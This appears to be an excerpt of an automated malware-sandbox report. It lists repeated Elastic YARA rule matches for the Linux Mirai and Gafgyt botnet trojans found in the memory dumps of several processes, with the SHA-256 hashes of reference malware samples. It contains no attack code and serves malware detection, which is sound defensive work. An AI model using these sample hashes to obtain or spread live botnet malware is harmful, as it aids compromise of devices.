Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
